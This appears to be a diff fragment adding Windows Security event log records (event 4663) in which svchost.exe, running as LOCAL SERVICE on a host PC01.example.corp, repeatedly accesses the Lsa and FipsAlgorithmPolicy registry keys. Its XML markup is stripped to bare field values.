+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452863
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452862
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452861
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452860
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452859
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452858
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452857
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452856
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452855
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452854
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452853
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452852
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452851
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452850
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452849
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452848
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452847
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452846
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452845
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452844
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452843
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452842
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452841
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452840
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452839
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452838
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452837
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452836
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452835
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452834
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452833
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452832
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452831
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452830
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452829
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452828
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452827
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452826
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452825
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452824
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452823
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
